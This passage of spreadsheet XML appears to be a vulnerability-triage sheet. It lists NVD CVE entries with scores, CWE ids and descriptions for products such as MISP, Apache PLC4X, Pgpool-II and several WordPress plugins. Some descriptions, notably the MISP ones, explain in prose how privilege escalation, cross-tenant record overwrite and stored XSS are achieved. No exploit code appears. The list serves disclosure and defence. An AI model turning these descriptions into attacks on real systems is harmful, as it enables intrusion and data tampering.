      <c r="B104" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C104" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-92871</t>
        </is>
      </c>
      <c r="D104" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E104" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F104" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G104" s="5" t="inlineStr"/>
      <c r="H104" s="5" t="inlineStr"/>
      <c r="I104" s="5" t="inlineStr"/>
      <c r="J104" s="5" t="inlineStr"/>
      <c r="K104" s="5" t="inlineStr"/>
      <c r="L104" s="5" t="inlineStr"/>
      <c r="M104" s="5" t="inlineStr"/>
      <c r="N104" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P104" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q104" s="5" t="inlineStr"/>
      <c r="R104" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="S104" s="5" t="inlineStr">
        <is>
          <t>A NULL pointer dereference vulnerability exists in Pgpool-II, which may allow an unauthenticated attacker to cause abnormal termination of the watchdog process.</t>
        </is>
      </c>
      <c r="T104" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-92871</t>
        </is>
      </c>
    </row>
    <row r="105">
      <c r="A105" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B105" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C105" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102121</t>
        </is>
      </c>
      <c r="D105" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E105" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F105" s="5" t="inlineStr">
        <is>
          <t>9119a7d8-5eab-497f-8521-727c672e3725</t>
        </is>
      </c>
      <c r="G105" s="5" t="inlineStr"/>
      <c r="H105" s="5" t="inlineStr"/>
      <c r="I105" s="5" t="inlineStr"/>
      <c r="J105" s="5" t="inlineStr"/>
      <c r="K105" s="5" t="inlineStr"/>
      <c r="L105" s="5" t="inlineStr"/>
      <c r="M105" s="5" t="inlineStr"/>
      <c r="N105" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O105" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P105" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q105" s="5" t="inlineStr"/>
      <c r="R105" s="5" t="inlineStr">
        <is>
          <t>CWE-200, CWE-306</t>
        </is>
      </c>
      <c r="S105" s="5" t="inlineStr">
        <is>
          <t>A form-rendering interface in the Advanced Forms component is reachable without authentication so that published forms can be displayed to anonymous visitors, but it returned more data than the form itself required. Anyone who knew the web address of a published form could potentially retrieve the form owner's Kiteworks account profile, including personal details, along with parts of the deployment's configuration settings; no passwords, authentication tokens, or multi-factor secrets were exposed.</t>
        </is>
      </c>
      <c r="T105" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102121</t>
        </is>
      </c>
    </row>
    <row r="106">
      <c r="A106" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B106" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C106" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102454</t>
        </is>
      </c>
      <c r="D106" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E106" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F106" s="5" t="inlineStr">
        <is>
          <t>twcert@cert.org.tw</t>
        </is>
      </c>
      <c r="G106" s="5" t="inlineStr"/>
      <c r="H106" s="5" t="inlineStr"/>
      <c r="I106" s="5" t="inlineStr"/>
      <c r="J106" s="5" t="inlineStr"/>
      <c r="K106" s="5" t="inlineStr"/>
      <c r="L106" s="5" t="inlineStr"/>
      <c r="M106" s="5" t="inlineStr"/>
      <c r="N106" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P106" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q106" s="5" t="inlineStr"/>
      <c r="R106" s="5" t="inlineStr">
        <is>
          <t>CWE-434</t>
        </is>
      </c>
      <c r="S106" s="5" t="inlineStr">
        <is>
          <t>EasyFlow .NET developed by Digiwin has an Arbitrary File Upload vulnerability. Privileged remote attackers can upload and execute web shell backdoors, thereby enabling arbitrary code execution on the server.</t>
        </is>
      </c>
      <c r="T106" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102454</t>
        </is>
      </c>
    </row>
    <row r="107">
      <c r="A107" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B107" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C107" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103239</t>
        </is>
      </c>
      <c r="D107" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E107" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F107" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G107" s="5" t="inlineStr"/>
      <c r="H107" s="5" t="inlineStr"/>
      <c r="I107" s="5" t="inlineStr"/>
      <c r="J107" s="5" t="inlineStr"/>
      <c r="K107" s="5" t="inlineStr"/>
      <c r="L107" s="5" t="inlineStr"/>
      <c r="M107" s="5" t="inlineStr"/>
      <c r="N107" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P107" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q107" s="5" t="inlineStr"/>
      <c r="R107" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-862</t>
        </is>
      </c>
      <c r="S107" s="5" t="inlineStr">
        <is>
          <t>MISP contains a privilege escalation vulnerability in the tag collection creation and editing functionality. The affected actions accepted the full HTTP request payload and passed it to a bulk-association save operation, which writes not only the intended tag collection record but also any associated model data present in the payload.
A user holding the tag editor permission could craft a request that includes additional model data (such as User or Organisation records) alongside the tag collection fields. Because the save operation processed all associated models indiscriminately, the injected sibling records were written to the database, enabling the attacker to modify or create privileged accounts and escalate to site administrator.
Preconditions:
- An authenticated account with the tag editor permission (perm_tag_editor)
- Network access to the MISP instance
Impact:
- Unauthorized creation or modification of User and Organisation records
- Privilege escalation from tag editor to site administrator
Affected versions: &lt; 2.5.48</t>
        </is>
      </c>
      <c r="T107" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103239</t>
        </is>
      </c>
    </row>
    <row r="108">
      <c r="A108" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B108" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C108" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103398</t>
        </is>
      </c>
      <c r="D108" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E108" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F108" s="5" t="inlineStr">
        <is>
          <t>disclosure@vulncheck.com</t>
        </is>
      </c>
      <c r="G108" s="5" t="inlineStr"/>
      <c r="H108" s="5" t="inlineStr"/>
      <c r="I108" s="5" t="inlineStr"/>
      <c r="J108" s="5" t="inlineStr"/>
      <c r="K108" s="5" t="inlineStr"/>
      <c r="L108" s="5" t="inlineStr"/>
      <c r="M108" s="5" t="inlineStr"/>
      <c r="N108" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P108" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q108" s="5" t="inlineStr"/>
      <c r="R108" s="5" t="inlineStr">
        <is>
          <t>CWE-73</t>
        </is>
      </c>
      <c r="S108" s="5" t="inlineStr">
        <is>
          <t>OpenSave through 2.4.0 fails to properly validate save paths supplied by paired peers in the manifest request handler. Attackers can specify arbitrary directories outside configured save locations to read and write files through manifest and sync routes.</t>
        </is>
      </c>
      <c r="T108" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103398</t>
        </is>
      </c>
    </row>
    <row r="109">
      <c r="A109" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B109" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C109" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97150</t>
        </is>
      </c>
      <c r="D109" s="5" t="n">
        <v>8.6</v>
      </c>
      <c r="E109" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F109" s="5" t="inlineStr">
        <is>
          <t>vultures@jpcert.or.jp</t>
        </is>
      </c>
      <c r="G109" s="5" t="inlineStr"/>
      <c r="H109" s="5" t="inlineStr"/>
      <c r="I109" s="5" t="inlineStr"/>
      <c r="J109" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K109" s="5" t="inlineStr"/>
      <c r="L109" s="5" t="inlineStr"/>
      <c r="M109" s="5" t="inlineStr"/>
      <c r="N109" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P109" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q109" s="5" t="inlineStr"/>
      <c r="R109" s="5" t="inlineStr">
        <is>
          <t>CWE-829</t>
        </is>
      </c>
      <c r="S109" s="5" t="inlineStr">
        <is>
          <t>When converting baserCMS4-style addons to baserCMS5-style ones,
BcAddonMigrator includes "config.php" from the addon, which means the PHP code in the file is executed.
Arbitrary files on the system may be read or deleted by an administrative user.</t>
        </is>
      </c>
      <c r="T109" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97150</t>
        </is>
      </c>
    </row>
    <row r="110">
      <c r="A110" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B110" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C110" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102511</t>
        </is>
      </c>
      <c r="D110" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E110" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F110" s="5" t="inlineStr">
        <is>
          <t>security@apache.org</t>
        </is>
      </c>
      <c r="G110" s="5" t="inlineStr"/>
      <c r="H110" s="5" t="inlineStr"/>
      <c r="I110" s="5" t="inlineStr"/>
      <c r="J110" s="5" t="inlineStr">
        <is>
          <t>github, go</t>
        </is>
      </c>
      <c r="K110" s="5" t="inlineStr"/>
      <c r="L110" s="5" t="inlineStr"/>
      <c r="M110" s="5" t="inlineStr"/>
      <c r="N110" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P110" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q110" s="5" t="inlineStr"/>
      <c r="R110" s="5" t="inlineStr">
        <is>
          <t>CWE-129, CWE-248, CWE-835, CWE-940</t>
        </is>
      </c>
      <c r="S110" s="5" t="inlineStr">
        <is>
          <t>Improper Verification of Source of a Communication Channel in the ADS discovery of the Go implementation of Apache PLC4X (PLC4Go) allows an attacker able to send UDP datagrams to the discovering host to redirect subsequent connections to an arbitrary, attacker-chosen address. The discovery result's connection 
address was derived from the AmsNetId claimed in the response body rather than from the datagram's actual source address. One spoofed discovery response can therefore insert an inventory entry pointing at any host, including hosts outside the local network, and an application that connects to discovered devices
will open its ADS session, including any configured route credentials, to that host.
Additionally, discovery listeners in both implementations can be disabled by a single malformed datagram:
- In PLC4Go ADS discovery, a short version block causes a panic that ends the listener for the rest of the discovery call, so legitimate devices answering afterwards are not reported.
- In PLC4J, the ADS and EtherNet/IP discoverers stop on an unhandled exception from a malformed response.
- The PLC4J Modbus discoverer can be made to spin indefinitely, consuming a CPU core, by a scanned host that sends a partial response.
Exploitation requires the application to invoke the discovery API, which is opt-in, and for the connection redirect, to act on the discovered items.
This issue affects Apache PLC4X: PLC4Go from 0.11.0 before 1.0.0; PLC4J ADS and Modbus drivers from 0.10.0 before 1.0.0; PLC4J EtherNet/IP driver from 0.11.0 before 1.0.0. PLC4Go is consumed as the Go module github.com/apache/plc4x/plc4go; versions refer to the corresponding Apache PLC4X releases.
Users are recommended to upgrade to version 1.0.0, which fixes the issue. Version 1.0.0 derives the connection address from the datagram's source address and logs a warning when the claimed AmsNetId disagrees with it.</t>
        </is>
      </c>
      <c r="T110" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102511</t>
        </is>
      </c>
    </row>
    <row r="111">
      <c r="A111" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B111" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C111" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-10739</t>
        </is>
      </c>
      <c r="D111" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E111" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F111" s="5" t="inlineStr">
        <is>
          <t>2505284f-8ffb-486c-bf60-e19c1097a90b</t>
        </is>
      </c>
      <c r="G111" s="5" t="inlineStr"/>
      <c r="H111" s="5" t="inlineStr"/>
      <c r="I111" s="5" t="inlineStr"/>
      <c r="J111" s="5" t="inlineStr"/>
      <c r="K111" s="5" t="inlineStr"/>
      <c r="L111" s="5" t="inlineStr"/>
      <c r="M111" s="5" t="inlineStr"/>
      <c r="N111" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P111" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q111" s="5" t="inlineStr"/>
      <c r="R111" s="5" t="inlineStr">
        <is>
          <t>CWE-23, CWE-59, CWE-73</t>
        </is>
      </c>
      <c r="S111" s="5" t="inlineStr">
        <is>
          <t>Cato Networks SDP Client for Windows before 6.12.6 allows a local user to delete arbitrary files with SYSTEM privileges via improper validation of a client-supplied SID over a local IPC named pipe.</t>
        </is>
      </c>
      <c r="T111" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-10739</t>
        </is>
      </c>
    </row>
    <row r="112">
      <c r="A112" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B112" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C112" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94115</t>
        </is>
      </c>
      <c r="D112" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E112" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F112" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G112" s="5" t="inlineStr"/>
      <c r="H112" s="5" t="inlineStr"/>
      <c r="I112" s="5" t="inlineStr"/>
      <c r="J112" s="5" t="inlineStr"/>
      <c r="K112" s="5" t="inlineStr"/>
      <c r="L112" s="5" t="inlineStr"/>
      <c r="M112" s="5" t="inlineStr"/>
      <c r="N112" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P112" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q112" s="5" t="inlineStr"/>
      <c r="R112" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S112" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Easy Pricing Tables &lt;= 4.1.2 versions.</t>
        </is>
      </c>
      <c r="T112" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94115</t>
        </is>
      </c>
    </row>
    <row r="113">
      <c r="A113" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B113" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C113" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-94177</t>
        </is>
      </c>
      <c r="D113" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E113" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F113" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G113" s="5" t="inlineStr"/>
      <c r="H113" s="5" t="inlineStr"/>
      <c r="I113" s="5" t="inlineStr"/>
      <c r="J113" s="5" t="inlineStr"/>
      <c r="K113" s="5" t="inlineStr"/>
      <c r="L113" s="5" t="inlineStr"/>
      <c r="M113" s="5" t="inlineStr"/>
      <c r="N113" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P113" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q113" s="5" t="inlineStr"/>
      <c r="R113" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S113" s="5" t="inlineStr">
        <is>
          <t>Unauthenticated SQL Injection in GamiPress &lt;= 8.0.2 versions.</t>
        </is>
      </c>
      <c r="T113" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-94177</t>
        </is>
      </c>
    </row>
    <row r="114">
      <c r="A114" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B114" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C114" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97287</t>
        </is>
      </c>
      <c r="D114" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E114" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F114" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G114" s="5" t="inlineStr"/>
      <c r="H114" s="5" t="inlineStr"/>
      <c r="I114" s="5" t="inlineStr"/>
      <c r="J114" s="5" t="inlineStr"/>
      <c r="K114" s="5" t="inlineStr"/>
      <c r="L114" s="5" t="inlineStr"/>
      <c r="M114" s="5" t="inlineStr"/>
      <c r="N114" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P114" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q114" s="5" t="inlineStr"/>
      <c r="R114" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S114" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Event Tickets &lt;= 5.29.5 versions.</t>
        </is>
      </c>
      <c r="T114" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97287</t>
        </is>
      </c>
    </row>
    <row r="115">
      <c r="A115" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B115" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C115" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-97293</t>
        </is>
      </c>
      <c r="D115" s="5" t="n">
        <v>8.5</v>
      </c>
      <c r="E115" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F115" s="5" t="inlineStr">
        <is>
          <t>audit@patchstack.com</t>
        </is>
      </c>
      <c r="G115" s="5" t="inlineStr"/>
      <c r="H115" s="5" t="inlineStr"/>
      <c r="I115" s="5" t="inlineStr"/>
      <c r="J115" s="5" t="inlineStr"/>
      <c r="K115" s="5" t="inlineStr"/>
      <c r="L115" s="5" t="inlineStr"/>
      <c r="M115" s="5" t="inlineStr"/>
      <c r="N115" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P115" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q115" s="5" t="inlineStr"/>
      <c r="R115" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S115" s="5" t="inlineStr">
        <is>
          <t>Contributor SQL Injection in Media LIbrary Assistant &lt;= 3.41 versions.</t>
        </is>
      </c>
      <c r="T115" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-97293</t>
        </is>
      </c>
    </row>
    <row r="116">
      <c r="A116" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B116" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C116" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-76146</t>
        </is>
      </c>
      <c r="D116" s="5" t="n">
        <v>8.4</v>
      </c>
      <c r="E116" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F116" s="5" t="inlineStr">
        <is>
          <t>vuln@krcert.or.kr</t>
        </is>
      </c>
      <c r="G116" s="5" t="inlineStr"/>
      <c r="H116" s="5" t="inlineStr"/>
      <c r="I116" s="5" t="inlineStr"/>
      <c r="J116" s="5" t="inlineStr"/>
      <c r="K116" s="5" t="inlineStr"/>
      <c r="L116" s="5" t="inlineStr"/>
      <c r="M116" s="5" t="inlineStr"/>
      <c r="N116" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O116" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="P116" s="5" t="inlineStr">
        <is>
          <t>2026-10-01</t>
        </is>
      </c>
      <c r="Q116" s="5" t="inlineStr"/>
      <c r="R116" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S116" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in Genian SSL PNS allows an attacker who knows only the client access ID, without the password, to execute arbitrary commands remotely</t>
        </is>
      </c>
      <c r="T116" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-76146</t>
        </is>
      </c>
    </row>
    <row r="117">
      <c r="A117" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B117" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C117" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103237</t>
        </is>
      </c>
      <c r="D117" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E117" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F117" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G117" s="5" t="inlineStr"/>
      <c r="H117" s="5" t="inlineStr"/>
      <c r="I117" s="5" t="inlineStr"/>
      <c r="J117" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K117" s="5" t="inlineStr"/>
      <c r="L117" s="5" t="inlineStr"/>
      <c r="M117" s="5" t="inlineStr"/>
      <c r="N117" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P117" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q117" s="5" t="inlineStr"/>
      <c r="R117" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-639</t>
        </is>
      </c>
      <c r="S117" s="5" t="inlineStr">
        <is>
          <t>MISP contains an improper input validation vulnerability in its ORM save path. When a user submits data through various endpoints (attribute add/edit, event edit, free-text import, sighting capture, shadow attribute proposal, event report creation, object reference add, user admin edit), the application sanitizes the flat record by stripping the primary key and pinning the event_id or object_id to the caller's context. However, the underlying ORM's set() method gives priority to a nested key whose name matches the model alias and discards the outer scalar fields.
An authenticated user with basic write permissions can exploit this by embedding a nested block under the model alias key inside their request. The sanitization logic (id removal, event_id pinning) is applied to the outer record, but the ORM binds to the inner record instead, which carries an attacker-chosen id and event_id. This allows the attacker to overwrite, re-parent, or soft-delete rows belonging to other organizations or events they have no read access to.
Impact:
- Cross-tenant data integrity compromise (attribute values rewritten, objects re-parented to attacker events, rows soft-deleted)
- Affects multiple entity types: Attribute, Object, EventReport, Sighting, AttributeTag, ShadowAttribute
- Requires only a low-privilege authenticated account with perm_add
Affected versions: &lt;2.5.48</t>
        </is>
      </c>
      <c r="T117" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103237</t>
        </is>
      </c>
    </row>
    <row r="118">
      <c r="A118" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B118" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C118" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-103321</t>
        </is>
      </c>
      <c r="D118" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E118" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F118" s="5" t="inlineStr">
        <is>
          <t>5a6e4751-2f3f-4070-9419-94fb35b644e8</t>
        </is>
      </c>
      <c r="G118" s="5" t="inlineStr"/>
      <c r="H118" s="5" t="inlineStr"/>
      <c r="I118" s="5" t="inlineStr"/>
      <c r="J118" s="5" t="inlineStr"/>
      <c r="K118" s="5" t="inlineStr"/>
      <c r="L118" s="5" t="inlineStr"/>
      <c r="M118" s="5" t="inlineStr"/>
      <c r="N118" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="P118" s="5" t="inlineStr">
        <is>
          <t>2026-09-30</t>
        </is>
      </c>
      <c r="Q118" s="5" t="inlineStr"/>
      <c r="R118" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-79</t>
        </is>
      </c>
      <c r="S118" s="5" t="inlineStr">
        <is>
          <t>MISP contains a stored cross-site script (XSS) vulnerability in the event graph preview feature.
The event graph preview image field was accepted and stored without server-side validation. On the client side, the stored value was rendered into an HTML img element's src attribute via string concatenation, allowing a crafted value to break out of the attribute context and inject arbitrary script.
Preconditions:
- An authenticated MISP user with the ability to create or modify an event graph entry.
- A second user (the victim) who views the event graph and triggers the preview popover.
Impact:
- Execution of arbitrary JavaScript in the victim's browser within the MISP application context.
- Potential theft of session tokens, cookies, or sensitive data accessible to the victim's browser.
- Potential for performing actions on behalf of the victim within the MISP application.
Affected: MISP versions prior to the fix (commit applied after v2.5.48).</t>
        </is>
      </c>
      <c r="T118" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-103321</t>
        </is>
      </c>
    </row>
    <row r="119">
      <c r="A119" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B119" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C119" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-46711</t>
        </is>
      </c>
      <c r="D119" s="5" t="n">
        <v>8.300000000000001</v>
      </c>
      <c r="E119" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F119" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G119" s="5" t="inlineStr"/>
      <c r="H119" s="5" t="inlineStr"/>
      <c r="I119" s="5" t="inlineStr"/>
      <c r="J119" s="5" t="inlineStr">
        <is>
          <t>gin, rust</t>
        </is>
      </c>
      <c r="K119" s="5" t="inlineStr"/>
      <c r="L119" s="5" t="inlineStr"/>
      <c r="M119" s="5" t="inlineStr"/>
      <c r="N119" s="5" t="inlineStr">
        <is>
